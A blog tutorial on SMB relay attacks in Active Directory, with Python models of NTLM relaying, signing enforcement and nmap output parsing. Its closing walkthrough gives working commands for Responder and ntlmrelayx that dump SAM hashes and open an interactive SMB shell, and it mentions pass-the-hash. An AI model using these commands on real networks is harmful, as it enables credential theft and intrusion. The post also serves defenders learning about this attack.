SMB relay attack
posted on 14 Jul 2022 under category Active-Directory in series Active_Directory
An SMB relay attack is one in which an attacker captures a user's NTLM hash and relays it to another machine on the network, masquerading as the user and authenticating against SMB to gain shell or file access.
The SMB relay attack abuses the NTLM challenge-response protocol. For a long time, SMB sessions commonly used the NTLM protocol for encryption and authentication purposes (i.e. NTLM over SMB). However, most sysadmins switched to KILE over SMB after research proved that the first version of NTLM is susceptible to man-in-the-middle attacks, the SMB relay attack counting among them.
In normal client-server communication there is a series of requests, each followed by a response. The idea behind an SMB relay attack is to position yourself between the client and the server in order to capture the packets transmitted between the two and pass them on.
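To make the mechanism concrete, here is a small model of the exchange described above. It is an added example written for this post, not code from the original article or from any of the tools it mentions, and it deliberately simplifies NTLM: the NT hash and HMAC-MD5 are replaced by SHA-256-based stand-ins (the account "alice" and her password are constructed sample data). What the model preserves is the property that matters for defenders: the response to a challenge can be forwarded verbatim by a machine in the middle, but the session signing key is derived from a secret the relayer never sees, so a server that requires SMB signing rejects the relayed session.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample account. The server stores a secret derived from the
# password (a stand-in for the NT hash); SHA-256 is used instead of MD4 and
# HMAC-MD5 so the model runs anywhere. The structure is what matters.
SAMPLE_USERS = {"alice": hashlib.sha256(b"Winter2022!").digest()}


def compute_response(secret: bytes, challenge: bytes) -> bytes:
    """Challenge-response: prove knowledge of the secret without sending it."""
    return hmac.new(secret, challenge, hashlib.sha256).digest()


def derive_session_key(secret: bytes, response: bytes) -> bytes:
    """Both legitimate ends derive the signing key from the secret, which a relayer never has."""
    return hmac.new(secret, response, hashlib.sha256).digest()


def sign(key: bytes, message: bytes) -> bytes:
    """Message signature over an SMB command (truncated MAC, as SMB signing does)."""
    return hmac.new(key, message, hashlib.sha256).digest()[:16]


class SmbServer:
    """Minimal SMB server model: issue a challenge, verify the response, then
    (optionally) require every command to carry a valid signature."""

    def __init__(self, require_signing: bool):
        self.require_signing = require_signing
        self.challenge: Optional[bytes] = None
        self.session_key: Optional[bytes] = None

    def negotiate(self) -> bytes:
        self.challenge = os.urandom(8)
        return self.challenge

    def authenticate(self, user: str, response: bytes) -> bool:
        secret = SAMPLE_USERS.get(user)
        if secret is None or self.challenge is None:
            return False
        if not hmac.compare_digest(compute_response(secret, self.challenge), response):
            return False
        self.session_key = derive_session_key(secret, response)
        return True

    def execute(self, command: bytes, signature: Optional[bytes]) -> str:
        if self.session_key is None:
            return "rejected: not authenticated"
        if self.require_signing:
            if signature is None or not hmac.compare_digest(sign(self.session_key, command), signature):
                return "rejected: missing or invalid signature"
        return "ok: " + command.decode()


class SmbClient:
    """The victim workstation: it answers whatever challenge it is shown."""

    def __init__(self, user: str, password: str):
        self.user = user
        self.secret = hashlib.sha256(password.encode()).digest()

    def answer(self, challenge: bytes) -> bytes:
        return compute_response(self.secret, challenge)

    def session_key_for(self, response: bytes) -> bytes:
        return derive_session_key(self.secret, response)


def direct_session(server: SmbServer, client: SmbClient, command: bytes) -> str:
    """Legitimate client talking to the server: it can sign its commands."""
    challenge = server.negotiate()
    response = client.answer(challenge)
    if not server.authenticate(client.user, response):
        return "auth failed"
    key = client.session_key_for(response)
    return server.execute(command, sign(key, command))


def relayed_session(server: SmbServer, client: SmbClient, command: bytes) -> str:
    """A machine in the middle forwards the challenge and the response verbatim.
    Authentication succeeds, but without the secret it cannot derive the
    session key, so it has no signature to attach to its command."""
    challenge = server.negotiate()
    response = client.answer(challenge)  # victim believes it is authenticating to the middle box
    if not server.authenticate(client.user, response):
        return "auth failed"
    return server.execute(command, None)


if __name__ == "__main__":
    victim = SmbClient("alice", "Winter2022!")
    print("direct, signing required :", direct_session(SmbServer(True), victim, b"list share"))
    print("relayed, signing optional:", relayed_session(SmbServer(False), victim, b"list share"))
    print("relayed, signing required:", relayed_session(SmbServer(True), victim, b"list share"))
```

The third case is the whole mitigation story in one line: when signing is merely "enabled" the relayed session is accepted, when it is "required" the same relayed session is refused. That is why the scan step below looks at signing mode rather than at whether SMB is reachable.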
sudo nmap -p445,139 --script=smb2-security-mode.nse -T4 192.168.1.0/24
** Add the IP address of each host that reports SMB signing as not required to target.txt.
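Reading the smb2-security-mode results by hand across a /24 is tedious, so here is a parser that turns the scan output into a per-host signing status. This is an added example written for this post, not part of the original write-up or of nmap; the scan text below is constructed in nmap's normal output format (the exact wording of the "disabled" case may differ between nmap versions, so the classifier keys on "and required" only). From a defender's side the same list is the remediation list: every host that is not "required" should get signing enforced via the "Microsoft network server: Digitally sign communications (always)" policy.

```python
import re

# Constructed sample output, as `nmap -p445,139 --script=smb2-security-mode.nse`
# prints it: one host with signing optional, one with it required, one with
# the ports closed (and therefore no script result).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.local (192.168.1.11)
Host is up (0.0020s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Nmap scan report for 192.168.1.12
Host is up (0.0015s latency).

PORT    STATE SERVICE
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
"""

# Matches both "Nmap scan report for 10.0.0.1" and "Nmap scan report for name (10.0.0.1)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")


def parse_signing(output: str) -> dict:
    """Map each host that produced an smb2-security-mode result to
    'required' or 'not required'. Hosts without a result are omitted."""
    results = {}
    host = None
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        if host and "Message signing" in line:
            text = line.lstrip("|_ ").lower()
            # Only "enabled and required" actually blocks relaying;
            # "enabled but not required" and "disabled" do not.
            results[host] = "required" if "and required" in text else "not required"
    return results


def hosts_needing_remediation(output: str) -> list:
    """Hosts whose SMB signing setting leaves them exposed to relaying."""
    return sorted(h for h, status in parse_signing(output).items() if status == "not required")


if __name__ == "__main__":
    for host, status in parse_signing(SAMPLE_NMAP_OUTPUT).items():
        print(f"{host:16} signing {status}")
    print("needs signing enforced:", hosts_needing_remediation(SAMPLE_NMAP_OUTPUT))
```

Feed it a real scan with `nmap ... -oN scan.txt` and `parse_signing(open("scan.txt").read())`; the hosts it returns as "not required" are the ones to fix, and re-running the scan after the policy change is the verification.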
Run Responder:
sudo responder -I eth0 -rdw -v
Responder should now look like this:
sudo ntlmrelayx.py -tf target.txt -smb2support
Request a share that does not exist using an admin account. Notice how the script checks whether Remote Registry is enabled, enables it if not, dumps the SAM, and then re-disables it.
We can then take these hashes and crack them, or we can even attempt a pass-the-hash attack and try to gain a shell with the NTLMv2 hash on a different machine on the network.
sudo ntlmrelayx.py -tf target.txt -smb2support -i
nc 127.0.0.1 11001
-> help
SMB relay attacks don't have the same potency as ransomware such as Ryuk or RobbinHood, but they can provide the necessary "backdoor" for those two and others. As always, play it safe, keep your apps and software up to date, and employ great cybersecurity.